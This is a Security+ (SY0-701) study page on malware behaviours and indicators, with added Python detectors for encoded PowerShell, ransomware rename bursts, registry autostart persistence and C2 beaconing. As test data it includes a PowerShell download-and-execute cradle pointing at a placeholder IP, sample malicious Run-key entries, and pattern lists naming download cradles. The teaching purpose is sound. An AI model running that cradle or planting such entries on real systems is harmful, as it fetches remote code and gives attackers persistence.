Malware Behaviors and Indicators
Key Takeaways
- SY0-701 tests malware by behavior, impact, and indicators of compromise, then asks for the best containment or mitigation step.
- Ransomware encrypts or exfiltrates data for extortion; worms self-propagate; Trojans hide malicious functions inside apparently useful software.
- Fileless malware abuses trusted tools such as PowerShell and Windows Management Instrumentation, executing in memory to minimize disk artifacts.
- Rootkits and bootkits prioritize stealth and persistence, while spyware and keyloggers prioritize collection of data and keystrokes.
- Strong indicators include anomalous process trees, fixed-interval network beacons, persistence registry changes, mass file writes, and impossible-travel logins.
How the Exam Frames Malware
Malware (malicious software) is tested on SY0-701 by behavior far more than by vocabulary. The 90-question exam (90 minutes, passing score 750 on a 100-900 scale) rarely asks "define a worm." It describes what code does - encrypts files, steals credentials, hides itself, spreads without help, opens remote control, or abuses a trusted process - and asks you to name it or pick the best response. Read the scenario for behavior first, then map it to a type.
| Malware type | Primary behavior | Common indicators | First mitigation focus |
|---|---|---|---|
| Virus | Attaches to files and needs execution | Modified files, unexpected hash changes | Remove infected files, restore clean copies |
| Worm | Self-propagates across systems with no user action | Rapid port scanning, repeated SMB (port 445) connections | Segment network, block the propagation path, patch the flaw |
| Trojan | Pretends to be legitimate software | Unknown app, unexpected outbound sessions | Remove the app, reimage if trust is lost |
| Ransomware | Encrypts and often exfiltrates data first | File renames, ransom note, mass write activity | Isolate host, disable compromised account, preserve evidence |
| Spyware | Secretly collects user or system data | Browser hijack, unusual data uploads | Remove software, review endpoint controls |
| Keylogger | Captures keystrokes or form input | Credential theft, suspicious input hooks | Reset exposed credentials from a clean device |
| Rootkit | Hides processes, files, or privileges | Security-tool blind spots, kernel anomalies | Rebuild from trusted media when integrity is uncertain |
| Backdoor / RAT | Provides unauthorized remote access | Beaconing, new listener, remote shell activity | Block command-and-control, isolate, rotate credentials |
| Logic bomb | Triggers on a date or event condition | Timed or event-based destructive action | Code review, change control, remove the trigger |
| Cryptominer | Hijacks CPU/GPU for cryptocurrency | Sustained high CPU/GPU, mining-pool connections | Remove process, close initial access vector |
Behavior Patterns and Fileless Malware
Fileless malware is a high-yield topic: it runs in memory and abuses trusted, signed binaries already present on the host (living off the land), so signature antivirus that scans files on disk sees little. PowerShell launched with an encoded command line (-enc or -EncodedCommand), wmic, mshta, and rundll32 are the classic examples. Each is a legitimate Windows binary, so the indicator is the parent process, the arguments, and what the process does next, not the file itself.
| Observed behavior | What it suggests |
|---|---|
| Mass file encryption with extension renames | Ransomware or destructive wiper |
| Credential access from LSASS memory or browser stores | Infostealer or post-exploitation tool |
| New scheduled task or Run-key registry value | Persistence mechanism |
| PowerShell downloading and decoding content | Fileless / staged payload |
| DNS queries to a random-looking domain every 60 seconds | Command-and-control beaconing |
| Lateral movement using admin shares (C$, ADMIN$) | Compromised privileged credentials |
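The behaviors in this table are easiest to recognize in process-creation telemetry once the encoded command line is decoded. As an added example (not part of the original study text), here is a Python triage routine that decodes a -EncodedCommand argument and flags living-off-the-land patterns. The event field names (image, parent_image, cmdline), the pattern list, the Office-parent and user-writable-path heuristics, and the sample events are all assumptions constructed for this example.

```python
from __future__ import annotations

import base64
import re

# Added example: triage Windows process-creation events for living-off-the-land
# abuse. Event dicts and field names are constructed for this example, not a
# specific product schema.

LOLBINS = {"powershell.exe", "wmic.exe", "mshta.exe", "rundll32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")

# Patterns in a command line (or its decoded payload) that point at staging.
SUSPICIOUS_PATTERNS = {
    "download cradle": r"downloadstring|downloadfile|net\.webclient|invoke-webrequest",
    "invoke-expression": r"\biex\b|invoke-expression",
    "hidden window": r"-w(?:indowstyle)?\s+hidden",
    "policy bypass": r"-e(?:p|xecutionpolicy)\s+bypass",
    "nested base64": r"frombase64string",
}

# -e / -ec / -en / -enc / -encodedcommand are the common spellings of the switch.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)


def encode_for_powershell(script: str) -> str:
    """Produce what an attacker passes to -EncodedCommand: Base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the plaintext behind -enc/-EncodedCommand, or None if absent or malformed.

    Decoding as UTF-8 is the classic analyst mistake: PowerShell expects UTF-16LE,
    so a naive decode shows every other character as a NUL.
    """
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_process_event(event: dict) -> list[str]:
    """Reasons one process-creation event looks like LOLBin abuse (empty list = nothing seen)."""
    reasons: list[str] = []
    if _basename(event["image"]) not in LOLBINS:
        return reasons
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded powershell command")
        cmd = f"{cmd} {decoded}"  # inspect the wrapper and the payload together
    low = cmd.lower()
    for label, pattern in SUSPICIOUS_PATTERNS.items():
        if re.search(pattern, low):
            reasons.append(label)
    if any(p in low for p in USER_WRITABLE):
        reasons.append("user-writable path in command line")
    parent_path = event.get("parent_image", "")
    parent = _basename(parent_path)
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by office app {parent}")
    if any(p in parent_path.lower() for p in USER_WRITABLE):
        reasons.append("parent runs from user-writable path")
    return reasons


def suspicious_events(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that produced at least one reason."""
    out = []
    for i, ev in enumerate(events):
        reasons = triage_process_event(ev)
        if reasons:
            out.append((i, reasons))
    return out


# Constructed sample: the attachment-to-PowerShell chain from the page's scenario,
# one benign admin script, and an Office-spawned rundll32 loading a DLL from Temp.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Users\alice\Downloads\invoice_viewer.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_for_powershell(PAYLOAD)},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"image": r"C:\Windows\System32\rundll32.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r"rundll32.exe C:\Users\alice\AppData\Local\Temp\x.dll,Run"},
]

if __name__ == "__main__":
    for idx, why in suspicious_events(SAMPLE_EVENTS):
        print(idx, _basename(SAMPLE_EVENTS[idx]["image"]), "->", ", ".join(why))
```

The benign inventory script is left alone because a bare PowerShell launch is not an indicator; the first event is flagged on the decoded download cradle, the hidden window and the parent in a Downloads folder, which is the combination the exam scenario describes.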
Worked Scenario
A workstation logs this sequence:
| Time | Evidence |
|---|---|
| 09:12 | User opens invoice_viewer.exe from an email attachment |
| 09:13 | powershell.exe starts with an encoded command line |
| 09:14 | Dozens of documents are renamed with a new extension |
| 09:15 | File-server logs show the same user modifying shared files |
The chain points to a Trojan-delivered loader (the attachment), fileless PowerShell staging (the encoded command line), and ransomware impact that has already reached a file share. The best immediate action is containment: isolate the endpoint from the network, disable or reset the compromised account, and revoke its access to the affected shares. The incident-response process SY0-701 tests is preparation, detection, analysis, containment, eradication, recovery, and lessons learned. Restoring from backup is recovery; it comes only after eradication, because restoring into a network where the root cause is still active simply reinfects the clean data.
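A detection for the 09:14 step, added here as an example rather than taken from the page: the rename burst is keyed on the extension the files acquire, because a user or backup job renaming many files usually keeps the extension while ransomware swaps it on every file it touches. The file-event field names (ts, op, user, old, new), the window and threshold, and the sample events are constructed assumptions.

```python
from __future__ import annotations

from collections import deque
from datetime import datetime, timedelta

# Added example: detect the "dozens of documents renamed" impact from file
# events. Fields (ts, op, user, old, new) are assumptions standing in for
# file-server audit or EDR file telemetry; the events are constructed.


def extension_of(path: str) -> str:
    name = path.rsplit("\\", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def detect_mass_rename(events: list[dict], window_s: int = 60, threshold: int = 20) -> dict | None:
    """First (user, new extension) pair crossing `threshold` renames inside `window_s` seconds.

    Renames that keep the extension are ignored, so the sliding window counts
    only files gaining a new extension, the ransomware signature.
    """
    windows: dict[tuple[str, str], deque] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["op"] != "rename":
            continue
        new_ext = extension_of(ev["new"])
        if new_ext == extension_of(ev["old"]):
            continue
        q = windows.setdefault((ev["user"], new_ext), deque())
        q.append(ev["ts"])
        while (ev["ts"] - q[0]).total_seconds() > window_s:
            q.popleft()  # drop renames that fell out of the window
        if len(q) >= threshold:
            return {"user": ev["user"], "ext": new_ext, "count": len(q),
                    "window_start": q[0], "triggered_at": ev["ts"]}
    return None


T0 = datetime(2024, 3, 4, 9, 14, 0)


def make_rename_burst(start: datetime, count: int, new_ext: str, every_ms: int,
                      user: str = "alice") -> list[dict]:
    """Constructed burst: `count` documents gaining `new_ext`, one every `every_ms` ms."""
    return [{"ts": start + timedelta(milliseconds=i * every_ms), "op": "rename", "user": user,
             "old": f"\\\\FS01\\finance\\report_{i}.docx",
             "new": f"\\\\FS01\\finance\\report_{i}.docx.{new_ext}"} for i in range(count)]


# Normal activity: a user saving spreadsheets and finishing five drafts (.tmp -> .docx).
BENIGN = (
    [{"ts": T0 + timedelta(seconds=i), "op": "write", "user": "bob",
      "old": f"\\\\FS01\\hr\\doc_{i}.xlsx", "new": f"\\\\FS01\\hr\\doc_{i}.xlsx"} for i in range(50)]
    + [{"ts": T0 + timedelta(seconds=5 * i), "op": "rename", "user": "bob",
        "old": f"\\\\FS01\\hr\\draft_{i}.tmp", "new": f"\\\\FS01\\hr\\draft_{i}.docx"} for i in range(5)]
)
# The scenario's 09:14 row: forty finance documents gaining ".locked" within twenty seconds.
ATTACK = BENIGN + make_rename_burst(T0 + timedelta(seconds=20), 40, "locked", 500)

if __name__ == "__main__":
    print("benign:", detect_mass_rename(BENIGN))
    print("attack:", detect_mass_rename(ATTACK))
```

The finding carries the user and the new extension, which is exactly what the containment step needs: the account to disable, and the share paths to cut off. Tune the threshold to the share's normal rename rate; a low threshold on a busy document-management share will page on legitimate batch jobs.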
Common Traps
| Distractor | Better exam reasoning |
|---|---|
| "Run antivirus only" while malware is actively spreading | Contain first when active spread is confirmed; signature AV misses fileless |
| "Restore backups" before the infection path is closed | Recovery can be reinfected if root cause remains |
| "Delete logs to save disk space" | Preserve evidence and the timeline for forensics and legal hold |
| "A rootkit can be cleaned in place" | Rebuild from trusted media if system integrity cannot be trusted |
Persistence and Stealth Mechanisms
Beyond the initial infection, exam scenarios test how malware stays. Persistence keeps the malware running across reboots and logoffs, while stealth hides it from defenders. Recognizing these mechanisms in a description lets you classify the threat and choose eradication that actually removes it rather than just killing a single process.
| Mechanism | Where it lives | Why it matters |
|---|---|---|
| Run / RunOnce registry keys | Windows registry autostart | Re-launches malware at every login |
| Scheduled task or cron job | OS task scheduler | Survives reboot; can trigger on a timer |
| Service installation | New Windows service or daemon | Runs with high privilege at boot |
| Bootkit / UEFI implant | Boot firmware or MBR | Loads before the OS and antivirus |
| DLL search-order hijack | Application load path | Injects code into a trusted process |
| Rootkit hooking | Kernel or user-mode APIs | Hides files, processes, and connections |
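The Run/RunOnce rows of this table can be audited offline from a `reg export` of the key. As an added Python example (not the page's own material), the following parses a constructed .reg export and scores each autostart value on the signals a reviewer looks for: a LOLBin host, a user-writable path, interpreter evasion flags, and a script payload. The scoring weights, the minimum score, and the sample export are this example's assumptions; a single weak signal such as a path under AppData is deliberately not enough, because legitimate per-user software lives there too.

```python
from __future__ import annotations

import re

# Added example: audit Run/RunOnce values from a .reg export. The export text,
# weights and heuristics below are constructed assumptions for this example.

AUTOSTART_KEY = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.IGNORECASE)
LOLBINS = ("rundll32.exe", "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe",
           "powershell.exe", "cmd.exe", "wmic.exe")
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
EVASION_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-enc\w*|bypass", re.IGNORECASE)
SCRIPT_EXT = re.compile(r"\.(?:ps1|vbs|js|hta|bat|cmd)\b", re.IGNORECASE)

_KEY_LINE = re.compile(r"^\[(.+)\]$")
_STRING_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')


def _unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a leading backslash.
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str):
    """Yield (key, value_name, data) for each string value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = _KEY_LINE.match(line)
        if m:
            key = m.group(1)
            continue
        m = _STRING_VALUE.match(line)
        if m and key:
            yield key, _unescape(m.group(1)), _unescape(m.group(2))


def score_autostart(data: str) -> tuple[int, list[str]]:
    """Weight the signals that make an autostart command worth a closer look."""
    low = data.lower()
    score, reasons = 0, []
    for binary in LOLBINS:
        if re.search(r'(?:^|[\s"\\])' + re.escape(binary), low):
            score += 2
            reasons.append(f"lolbin:{binary}")
            break
    if any(p in low for p in USER_WRITABLE):
        score += 1
        reasons.append("user-writable path")
    if EVASION_FLAGS.search(low):
        score += 2
        reasons.append("interpreter evasion flags")
    if SCRIPT_EXT.search(low):
        score += 1
        reasons.append("script payload")
    return score, reasons


def audit_autostarts(reg_text: str, min_score: int = 2) -> list[dict]:
    """Autostart values (Run/RunOnce only) whose score reaches min_score."""
    findings = []
    for key, name, data in parse_reg_export(reg_text):
        if not AUTOSTART_KEY.search(key):
            continue
        score, reasons = score_autostart(data)
        if score >= min_score:
            findings.append({"key": key, "name": name, "data": data,
                             "score": score, "reasons": reasons})
    return findings


# Constructed export: one legitimate per-user app, two persistence entries, one
# system entry, and a string under a non-autostart key that must be ignored.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Updater"="rundll32.exe C:\\Users\\alice\\AppData\\Roaming\\svc\\u.dll,Start"
"Sync"="powershell.exe -w hidden -nop -File C:\\Users\\Public\\s.ps1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"

[HKEY_CURRENT_USER\Software\Contoso\App]
"LastCommand"="powershell.exe -w hidden"
'''

if __name__ == "__main__":
    for f in audit_autostarts(SAMPLE_REG):
        print(f["score"], f["name"], "->", ", ".join(f["reasons"]))
```

OneDrive scores only one point (its AppData path) and stays below the bar; the rundll32 and hidden-window PowerShell entries are exactly the patterns the persistence table describes. In practice the same scoring applies to scheduled-task actions and service binary paths, which this example does not parse.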
A potentially unwanted program (PUP) is a softer category - adware or bundled toolbars that are not overtly malicious but degrade the system and may track users. The exam contrasts PUPs with true malware to test whether you over-escalate a low-severity finding.
Quick Drill
Name the likely behavior for each clue: (1) hundreds of connection attempts to TCP 445 across subnets - worm propagation or lateral movement; (2) credentials used from a new country minutes after a normal session - infostealer or keylogger; (3) small encrypted packets to one external host every 60 seconds - C2 beaconing; (4) a process invisible to security tools but proven active in network logs - rootkit or tampering; (5) a new service that re-spawns the payload after every reboot - persistence via service installation.
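Clue (3) above, and the DNS row in the behavior-patterns table, both describe beaconing. The added Python example below (not from the original page) tests each destination's inter-arrival times for that regularity using the coefficient of variation of the gaps, which makes a 60-second and a 6-hour beacon comparable on one threshold. The traffic samples, the minimum event count and the jitter threshold are constructed assumptions.

```python
from __future__ import annotations

from datetime import datetime, timedelta
from statistics import mean, pstdev

# Added example: flag fixed-interval beaconing from connection (or DNS query)
# timestamps. Both traffic profiles below are constructed; the thresholds are
# this example's assumptions and need tuning per environment.


def events_from_deltas(start: datetime, dst: str, deltas_s: list[float]) -> list[dict]:
    """Build a timestamped event list from inter-arrival gaps (constructed input)."""
    ts, out = start, [{"ts": start, "dst": dst}]
    for gap in deltas_s:
        ts += timedelta(seconds=gap)
        out.append({"ts": ts, "dst": dst})
    return out


def beacon_candidates(conns: list[dict], min_events: int = 10, max_cv: float = 0.15) -> list[dict]:
    """Destinations whose inter-arrival times are too regular to be a human.

    cv = stdev / mean of the gaps is scale-free, so the same threshold covers
    short and long check-in periods. Implants add jitter to defeat this; raise
    max_cv and look at longer windows when hunting for them.
    """
    by_dst: dict[str, list[datetime]] = {}
    for c in conns:
        by_dst.setdefault(c["dst"], []).append(c["ts"])
    findings = []
    for dst, stamps in by_dst.items():
        if len(stamps) < min_events:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mu = mean(gaps)
        if mu <= 0:
            continue
        cv = pstdev(gaps) / mu
        if cv <= max_cv:
            findings.append({"dst": dst, "events": len(stamps),
                             "period_s": round(mu, 1), "cv": round(cv, 3)})
    return findings


T0 = datetime(2024, 3, 4, 9, 15, 0)
# Implant check-in: 60 s with a little jitter (the page's "every 60 seconds").
BEACON = events_from_deltas(T0, "203.0.113.5", [60, 61.5, 59, 62, 58, 60.5] * 5)
# Human browsing to a CDN: bursty, irregular gaps.
BROWSING = events_from_deltas(T0, "198.51.100.20",
                              [3, 45, 120, 7, 260, 15, 90, 33, 180, 5, 410, 22])
SAMPLE_CONNS = sorted(BEACON + BROWSING, key=lambda c: c["ts"])

if __name__ == "__main__":
    for f in beacon_candidates(SAMPLE_CONNS):
        print(f"{f['dst']}: {f['events']} events, period {f['period_s']}s, cv {f['cv']}")
```

The same routine works on DNS query logs keyed by queried name instead of destination IP, which is how the random-looking-domain clue in the behavior table is caught. Pair a cadence hit with the small, near-constant payload sizes from clue (3) before escalating; keep-alives from legitimate agents are also regular, so the destination's reputation and the initiating process decide the call.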
Practice Questions
- A workstation suddenly renames thousands of files with a new extension and drops a note demanding payment. What malware behavior is most likely? Ransomware: mass extension renames plus a ransom note are its signature impact.
- An analyst confirms a host is actively encrypting shared folders right now. What should be done first? Contain it: isolate the host from the network and disable the account it is using, before eradication and before any restore from backup.
- Which indicators most strongly suggest command-and-control activity? Select two. Fixed-interval beacons to one external host (small encrypted packets every 60 seconds) and DNS queries to a random-looking domain at a regular cadence; a new listener or remote shell activity points to a backdoor/RAT as well.